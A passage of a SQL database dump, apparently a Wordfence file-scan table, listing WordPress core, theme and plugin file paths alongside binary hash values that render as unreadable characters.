ƾ���','�C��<�i<D��8��;_r�z�D:w_U���','',0,'?'),('Q;���(����Mp*�','wp-admin/js/widgets/media-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�f��E �2�fl̫','���y��g���;��I�FNn����u0����','',0,'?'),('Q?�dcq�Y(r6�e�','wp-content/themes/skt-construction-lite/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6(���\n�\Z*�,?�','{���V��-�(jS�Hdg�_Q��5�A\r�gS','',0,'?'),('QJ���s3�R�aU*�s','wp-content/themes/twentynineteen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���հ&��Tgs\r','0�ed ��s��X������Q8���3�Z��','',0,'?'),('QT���*�f�P��.�','wp-admin/includes/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=��]5�Z�:�|','��fGȈ@��\"�\"�U��G���%�k]��X','',0,'?'),('QY��1�Tl��Vr<','wp-includes/js/customize-views.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"r�<`����D��','b2�M��!o�;�-�veq��\\f�]l����:','',0,'?'),('Q^vC�F�R��_','wp-content/themes/the-minimal/fonts/fontawesome-webfont.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ہ-�p�莈�D�ɢ~�','��FTM�߇�E�7y6&<-���5]��|�VQ','',0,'?'),('Q`�R!��T\0�4��9]','wp-content/plugins/unyson/framework/static/libs/entypo/fonts/entypo.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T`��D�4�2�^r��','^��u�&�]r0�ye�!}U�ai�YƼԜ','',0,'?'),('QuoPX��\0��Sڞ','wp-admin/images/bubble_bg.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�g<ć�I����0','\'+u�W�`-A�����S\'�}S~S��b���','',0,'?'),('Qwa��t%F�%2��','wp-content/themes/twentytwenty/templates/template-full-width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[6i\"Y|���f8K','Hh�E�.P�ڬ�.��M��eMo�@\0��W�','',0,'?'),('Q��cm�uX\Z3�B+��X','wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VD�\'\'���C��b�x','fkYQ@Y�^,\n�?�J�Y���\0�C�ł��','',0,'?'),('Q��7�%�Z<΄����','wp-content/themes/wen-business/inc/customizer/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JOm3N�g\\�rf����','�2}(;�\n�߷�$y[40���i�s|�@;���','',0,'?'),('Q���@wX:\\`l���','wp-content/themes/verbosa/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H��5�ɦ�����','*�e�\"P�x���0M�x���7i�1�1�s,U','',0,'?'),('Q�)+���m8J�c���','wp-content/themes/vega/assets/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/���=�1','Pl|X	oa�I9�(��Ӣ��4�CI336����B','',0,'?'),('Q���\n���ʓ��#f�','wp-content/themes/the-minimal/images/upgrade.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r(���Db\"��8,�','aVja���X꫐Sr��G���Zyr�T���','',0,'?'),('Q��6K4������H','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bv�J�Y|���O[k��','R\r��½]����(%^V�z �hSG�LSO�','',0,'?'),('Q�^����l}��d�','wp-content/plugins/contact-form-7/languages/contact-form-7-ka_GE.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�qv�R|�1\'�`r��','�q���g�)d�Gu�S�Qfg���\\&�\nz”P','',0,'?'),('Q� `�7������%�','wp-content/themes/sg-window/inc/css/image.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���V�~-?�d�@)','&��A�C~v�\Z��!�jK����&z�5u8�','',0,'?'),('Q��-�C-]C����','wp-includes/sitemaps/class-wp-sitemaps-stylesheet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�����81','���v$�͏���,��5�6X�~Xʧ��ℐ���','',0,'?'),('Q�5ޱ����r^��','wp-content/plugins/all-in-one-wp-migration/lib/model/export/class-ai1wm-export-media.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Âo��t�I��jW��','.z�i�s3vE$�d�Bn�۵��|�s�����','',0,'?'),('Q�`���8�M�8','wp-admin/press-this.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'xq��>�/���EQ�L','>��k�(���B�������h\\�ѫ͜:','',0,'?'),('Q��4��%��z�>*��I','wp-content/plugins/wordpress-seo/inc/class-upgrade.php',0,'��󵚡�i�Gg��','��󵚡�i�Gg��','?y��]��d�\0�6I��3�Ě��b��i�8�','',0,'?'),('Q��K�\0��H�0��	E�','wp-content/themes/twentyseventeen/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']E9�|�?>r�;ή�','�fC#��z���a���/ؽ��V�h��{۞<N','',0,'?'),('Q�)���>�ܠ�כ�','wp-content/plugins/unyson/framework/core/components/extensions/manager/static/img/thumbnails/breadcrumbs.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Ѹ����O��','��\\02b&+B�dz)I�1\0�L\ZH\rO���','',0,'?'),('Q��$��(�V!�P�','wp-content/themes/point/fonts/point.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|>#Za��~�\\\n','ڬB�1��\";UR��҃jA�Xt��e�Ͱ�','',0,'?'),('Q�Y�Qf�7�@2xC','wp-content/themes/twentynineteen/images/pattern_02.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ߢБ^N\0�[1#U','OH[�Byj��[�#��A縬8Ė�_7	r�','',0,'?'),('Q�.ì�\\���XeOI','wp-content/plugins/wordfence/views/dashboard/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','դ��q�.�\rl4G�','�˾�6�/(���OE||\'�郊�$emԬ!�','',0,'?'),('Q�����l��g�-��','wp-admin/js/comment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wJ���၁�x�c','����y�ږ�В\"ߏ�|Vj4��s\"��A?�h�','',0,'?'),('R�v5��W6�`�ھ�','wp-includes/css/dist/nux/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4=�\\^\0��Y�D���','�Q�E�ܝ��޴�~/F�g�!E�cw���5\"R','',0,'?'),('R\r>���@i��v�B\"','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.sr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ہݬ�/�\'����','�Z�)7tD�W?�6�Z�@��bM�VH�9�Ȣ�Һ','',0,'?'),('R.�v�dc�8~\\SI��','wp-content/themes/hueman/assets/front/img/demo/6-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9���%�-(�$!�','7WQkѩ(y�(YltӃ�Yxp5ңӈ&A��','',0,'?'),('R3�uX��n\\eA�~�','wp-content/themes/point/images/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3���9�','\n�0i�p,�Ŕ�\Z�m�=A�ʹ�c��N��','',0,'?'),('R3�Us�3��}T��','wp-includes/js/autosave.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wˁ����a�7��','�7 �V!�39���=e�G��V�����.i�\n��','',0,'?'),('R:h��π6����','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/views/script.php',0,'��D�VOG���p<�3k','��D�VOG���p<�3k','#]1=nQ��~\'�8<�{3�^}�#/��_�3�;\ZI','',0,'?'),('RQ�b7f�� |~ۓ�(','wp-admin/js/widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�AR4&�ݣ!N�..\r','tG��Z,8�|XE&Ma�-Rњk������\'0','',0,'?'),('RVhb�yU��!�Я','wp-content/themes/square/css/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9OhMf��f�]>�','E�VS`$?�a�j`)��x�0��+X����K��','',0,'?'),('Ra��ce��JT�','wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3I�w>��A�\n�','������F��\0O�.Qm+v�Hj�E�odFX�','',0,'?'),('ReQ�B�V����J�','wp-content/plugins/contact-form-7/languages/contact-form-7-bel.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�o���ij���','���U�͢}���8!�\"�N!�K�\n5�','',0,'?'),('Rhz���%�s!ӇVd','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php',0,'p�T&J��)e}��o','p�T&J��)e}��o','���X�����\"�}�>i��ˇ����O8\r?�J','',0,'?'),('Ri��^p;fW}p��p|','wp-content/plugins/all-in-one-wp-migration/lib/model/import/class-ai1wm-import-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$Up���','^���t� %��>e�=�(���\"<{h,���L','',0,'?'),('Rj�q�Iӏ\Z�Y&�','wp-includes/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ăd��O�[�S\nc\0','^o�&[�l����2Zg/�?>��P~C��Iȗ','',0,'?'),('Rmj���\\X����ָQ�','wp-content/plugins/wordfence/css/wf-font-awesome.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��M��ً�V���:','997dI�Ou�-����%enԻ�1�����I','',0,'?'),('R���1?���Y�VDt�','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('R�b�:Z�K��L�','wp-admin/js/application-passwords.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E���H��G��\'�\ZR','�&���HO�+\r�F�(��^(I�3��P�Qo','',0,'?'),('R���i�)ɳ��','wp-content/themes/mh-magazine-lite/languages/cs_CZ.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�ÿaa�u$묗','����\r��z#K����@/�\Z�~�4����e\rz','',0,'?'),('R�x�4Mp@�9u\n֊ p','wp-includes/images/wpspin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hk�u�R�\r@9k���','���!�Fױ����(���#��1��:�','',0,'?'),('R��|Rx/�bzn9\0*�J','wp-admin/includes/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L����S�0���','S[��n��+�𙒽�C�w�C�쌑�)n�d','',0,'?'),('R���#|�D���Q���','wp-content/plugins/unyson/framework/helpers/class-fw-wp-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ى�wr�ڬ3���S��`',' �x�t�E�죒fhA���\\��K-�M\0�=ť��','',0,'?'),('R�y��@�w���2�','wp-content/themes/clean-magazine/languages/de_DE.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\n{�lDe٩J�J�','t�Z��&ȃJq論���dحD�\0�v/R�','',0,'?'),('R�\\SC�|ju�9��A','wp-includes/js/media-grid.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ű�P�u���$ʺ','�q���u0R�JI@����C|ї���`ܿ+5�','',0,'?'),('R��)nUy��Z*a','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/team-member/static.php',0,'Y��p�@a�sҜ=p','Y��p�@a�sҜ=p','���_�m^�e�v�[��]������Q','',0,'?'),('R��\\�|�>w)�,`��','wp-content/plugins/contact-form-7/languages/contact-form-7-sr_RS.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Te�]�\\I��c�6��','D�o�~���6�L>;��B��\0p��^�&��','',0,'?'),('R��!�Y��sՓ�*P�g','wp-content/themes/clean-magazine/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��$prM��o��3s',' ��9��S�T$��O�`���	`�/y�b�','',0,'?'),('R¥�����Le�q	�&�','wp-admin/js/user-suggest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Za�K�=���l�s�','�>�n�\"S����q��t�\"qz��ي�*pZ#�+x','',0,'?'),('R��%��G�z��ov','wp-content/themes/hueman/assets/front/img/header/default-header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+Ny�Ek�ɓ�T��','�1w\nϸQ2\\�	}֪��r\\䁴�+��]�','',0,'?'),('R�J٥D��c�v�ցK','wp-content/themes/twentyseventeen/template-parts/post/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q �/?�z�3=�1�A��','Ue��d�}\Z%���g���5��Ƴn�����9�}','',0,'?'),('R�&�#��{L��(��','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_center-block.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��NV��U���{ ',']\"\\�q�U����,��L�`����4\Z �hz','',0,'?'),('R�[��U�Ul����)B','wp-content/themes/nirvana/languages/ru_RU.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Rk�TE�5?�(�5�','���z��v�ڋ\r�һ&	�u��)�蹏e�(','',0,'?'),('R�H\r0��!�d�?c&','wp-includes/widgets/class-wp-widget-categories.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('R��ڦ����r��O)Fu','wp-content/themes/hueman/assets/front/img/demo/10-520x245.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z%i��\0�dS��N','�܍ T�P�R0�Be�ޝj�W8�]�#�$��','',0,'?'),('R��Y\"�?9�hKs','wp-content/themes/travelify/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V,�f��2r������B','���3���DW%n�{���5�rO� ,+���[','',0,'?'),('R�q�[����\0I�x �','wp-content/themes/clean-magazine/inc/clean-magazine-default-options.php',0,'������|J��\\��0','������|J��\\��0','��.�v� ��fz[��X��RX\\�v���K','',0,'?'),('S\02y��93Q���x��','wp-content/themes/vega/assets/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9OhMf��f�]>�','E�VS`$?�a�j`)��x�0��+X����K��','',0,'?'),('S�=�r�8��uy@ge','wp-content/themes/square/inc/js/customizer-scripts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`B(�A�T�	��','*z j\"�\0C���H�@r$��Nx�* ��F����','',0,'?'),('Sq���	)<|��L�[','wp-content/themes/illdy/inc/tgm-plugin-activation/tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�c��^�TuY�','��c��Y`�ِE]�K���@]��&s��3�,','',0,'?'),('S,I܎!%�BNBa��','wp-content/themes/travelify/languages/fa_IR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�J�\0�KC�KX�','�qs�G�!��#�^`9\0KK�	�_a\Z��N�Q�','',0,'?'),('S.FȫA�j���(�:','wp-includes/js/hoverIntent.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�m���\n8��	�','�)�K���%A�Z&�y�`M��U!�i:A�[�','',0,'?'),('S0�־��K/17u���','wp-includes/js/jquery/ui/selectmenu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��Wj*m��Es�','�l$1dT��z֬�H\r���*�xQ��,e4e','',0,'?'),('SE�\0�Wi���w�c�','wp-content/themes/point/fonts/point.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p �ɏ��O��,O��','����Q��I�d���pb��rjձ�^\"�','',0,'?'),('SF�oR�GKoɲ6[/�','wp-content/themes/relia/inc/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1˦�p���� y�G','��a�F�}>��n�b��PT�Ŀ�8�?Ѷ','',0,'?'),('SX+7�1?���-','wp-includes/js/jcrop/Jcrop.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��7e�����Q�%K','!��@��X�7JŃ��p�3K�;S*!���L','',0,'?'),('SgҘJnݐ������','wp-content/themes/accelerate/fontawesome/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϣ-��������[��','�����{V�Hٰ�\0��MUDO��?6��nB�','',0,'?'),('Sj�~6��{�����X','wp-admin/css/colors/modern/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-v?L\0�\n��#��','�c��\Z���[T�7�8t/y�H��&�5�9R���','',0,'?'),('Sp�ƴ��ƖIw�|��','wp-content/themes/supernews/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѷ�Ќ�̲�Nf�	�','�����0�?y����ɡz%�@�0?6@Aqs~�','',0,'?'),('SzW��NKUS��','wp-includes/blocks/calendar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('S���O[N�.�v�e','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/index.html',0,'��ُ\0��	��B~','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('S�C��i1ۭ�j�','wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p��\\E���(��i','4�O���+o�c.`‹_����U��>�8��','',0,'?'),('S����p�>��Wr�YE','wp-comments-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.K��OQ ��ga��','LJ��h��`*�dr�}�6-�߁P�Q��{�','',0,'?'),('S�RT�Ħ�14\n/8�','wp-content/themes/lightly/js/vendor/jquery.fitvids.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�҈��a����E�','�6K�\n�`ט�Y�Fk� ���!l#�W�C','',0,'?'),('S�dlz�s�V7','wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�~МI�XP/��$','�s�em��/�;��֘���� aZ�H`�g3','',0,'?'),('S�`:}��!S`���\'�7','wp-content/themes/hueman/functions/admin/class-admin-update-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',��\n6��F(Đ.�C','�`T�s��b��T\r[�����pz��-P�\n','',0,'?'),('S����K^c~†“�','wp-content/themes/sg-window/img/icons/small/aim.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�|���6��','�M�y��V��G�ó���|׽O+���@� K','',0,'?'),('S��t� ��J�9���G','wp-includes/css/dist/block-directory/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� �W���l&����','>m_�����0�^e��m��`�o[���������','',0,'?'),('S�bc� �&�z�?�}','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_alerts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6��v�W1�[|��:>','�$�bta�HԱ=qv𘇑f쀀���>�','',0,'?'),('S��\\��\\yF�%���','wp-content/themes/supernews/acmethemes/customizer/single-posts/single-post-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׼��ά~G�`�t�M','�WD��-l�C`E�~l�tºx��&�d6�i-�','',0,'?'),('S���\n�pލG%�','wp-content/plugins/wordfence/crypto/vendor/composer/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]_�#D���\0��','\Z ��ے�%�4~N�~Gh!b��:w��Ɍ��\'','',0,'?'),('S�ޓ��C8siQ��K','wp-content/themes/nirvana/fonts/ubuntu-c-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�.V|1��_�D�','t	��y���7Q�x�j��t-Z����c�?\'S','',0,'?'),('S�c���+\nu�@3^','wp-content/themes/aqueduct/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x9R\Z�(�	��i���','D�Ai,>uF@SȔ�k��)&v�y+�����','',0,'?'),('Sķj	�N�-�����|','wp-content/themes/nirvana/images/socials/StumbleUpon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_|�S��&�=L��ͦ�','Y����8�HT�0�]�\r�9�� ����Y�','',0,'?'),('S��&�az8�Jض9�','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q&�W�������6���W','���ܺ��}Uw?-=�L�<L~H�]���|�','',0,'?'),('S��t����v��g�','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�a�7H�����\"o','0�*�A�x�CF?%�x���K<c\0p]/#^E','',0,'?'),('S�^�7jK5I6K�2!','wp-includes/Requests/Cookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��4�G��FdW(�','1׋��0*�E�3:/��2p��կ�\0K2^�(','',0,'?'),('S��0ӽ\nq����\n�5','wp-content/plugins/wordfence/modules/login-security/css/colorbox.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<��w\ri�컎vL*x�','�N�b���\r̎�/?+\'��bi\'�W�$@�i\0','',0,'?'),('T���D\r?:-��:\n��','wp-content/plugins/unyson/framework/extensions/shortcodes/helpers.php',0,'�5s��<��)���','�5s��<��)���','��-J���X�V��(:���!J��<���','',0,'?'),('T\n���#\"�h[�s��','wp-content/themes/nirvana/images/socials/RSS.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�������5k�r�','�E��ϟ<�hض��lɓ&�&�|��\n���','',0,'?'),('T�r���~�W]�','wp-includes/class-wp-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��³����N�X�)','\'؀<|���	�V�L�5�\0��`v�h�$��','',0,'?'),('T��@�&���*!��','wp-content/plugins/unyson/framework/helpers/type/class-fw-type-register.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i@|�k_]~7}�<�O=',']��B��7e�.}}�q��=�7d�����','',0,'?'),('T�;���0�TZ ��)','wp-content/plugins/unyson/framework/static/libs/qtip/jquery.qtip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���v$z�ҟ��@�@q','�/��8߀\\a��[�[���b%�[#�^8��\0','',0,'?'),('T!��+�g�r�w��76','wp-content/themes/sg-window/genericons/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4�Mi���Hj���JBc','��\0v1��s�N�>cID٦����I�0�-','',0,'?'),('T.�փFmK[���t','wp-content/themes/sg-window/inc/widget-tags-naigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*/��߆�[','Ӑp[�M��A�>�gd�Wm�1,�{\0Q�','',0,'?'),('T6K?���s� �7(�','wp-includes/customize/class-wp-customize-sidebar-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vj��B���ر���q','��{#�i�`��\0���j���` pǍ+�fF�','',0,'?'),('T?�?:q׮P��ah\'��','wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���AN�X[`h\0����','�\"xI�B6�E?�����i�\'26�5y/��','',0,'?'),('TM����l����','wp-admin/includes/class-wp-screen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FwPR���>�s�t��','��6���<S|�΍�\nϧZ�I����--?','',0,'?'),('Tq�JwyO2\nl����','wp-content/themes/nirvana/images/patterns/pattern4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{��/�и�C','i1��;x�.]W��a��;\"��fz��f/','',0,'?'),('Tv!q}�}�#�ê�{','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.museum.php',0,'�<JYe�1��%��1�','�<JYe�1��%��1�','�%��1ze7���x����z�1c�/�m��','',0,'?'),('Tw��=��+�6����','wp-includes/js/tinymce/wp-tinymce.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����--��T�J�;','��O���w�:�V�^�w�^[\n�	L�\'�6@-�\r�','',0,'?'),('T{\'���g,(:~�G','wp-content/themes/twentynineteen/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڈLBP��En�\\^	��P','�RSV%�6�){��O����x2��N�A���','',0,'?'),('T{��Qmc��7��0\"s','wp-content/plugins/wordfence/css/wf-onboarding.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�Kwt�G��\'�(�','��mǸ�${���&W�>�.{?�Wo�)�=�H�','',0,'?'),('T�.o@Ψ2�w�v��X�','wp-includes/js/jcrop/jquery.Jcrop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/a��Lru�4�\Z�','���Ϸ��yd�ix�{�p+��n�eځ��f�','',0,'?'),('T���vm?,�a���T4�','wp-includes/ID3/module.audio-video.quicktime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('T���z��:8vN\\��','wp-content/themes/hueman/assets/front/js/scripts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{B4�3g�Յ��5!:\0�','�6�4��˂���l�U�[e�t�5�4���y���','',0,'?'),('T��_T�-xE&�8���','wp-content/themes/twentyseventeen/assets/images/espresso.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�)=c#|��','�ed�G�Ks�,�v����E� A4\\\0��o7��)�','',0,'?'),('T���\r�fV�+� j�','wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gxX��JT��bx���','f��x�/�x��G�\n8�5�6�	Z�+','',0,'?'),('T��Z�d�C��j�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/row/views/view.php',0,'4�4���j(��h\\�q','4�4���j(��h\\�q','��{\Zt�MR�k-��\\���;��	����Tb�pU','',0,'?'),('T�#Tl^p9��?�','wp-content/themes/travelify/languages/fi.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�r�j����V�U=��','��MM��\n��;$���ݑ��q}�1��','',0,'?'),('T�>4!=fW){Z�','wp-content/plugins/unyson/framework/static/libs/unycon/fonts/Unycon.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��p#0�?SlC(B	','�/��g1�p9)$�,T�Y󎨤X�t�+;','',0,'?'),('T�.��)m�&����I','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�41l#}�p���zk1','��h��	�_��֚����!E��4�\Zv��F��','',0,'?'),('T܌�7`\0���(�','wp-includes/js/mediaelement/renderers/vimeo.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('T��~A��ط�Ը�}C�','wp-content/themes/precious-lite/js/jquery.nivo.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P.�M<�����Q#\n�','O-r�rY�O���ga�/�- <��҄i2h�','',0,'?'),('T�nFL@y���DR*\\/','wp-content/plugins/unyson/framework/core/components/extensions/manager/views/install-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʧ�B	N�0�p��','�c�:_\n�6V��9�5�g�M7.@����1�T=','',0,'?'),('T�QaP\0�?�򢣡H�','wp-content/themes/twentyseventeen/assets/js/global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�ȭ���k@�*ln','��X�ϫ�ZW�g[�SSmv���[�ߖȋ','',0,'?'),('T��r7���=��9�','wp-content/themes/verbosa/resources/images/headers/breakfast.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y&��� 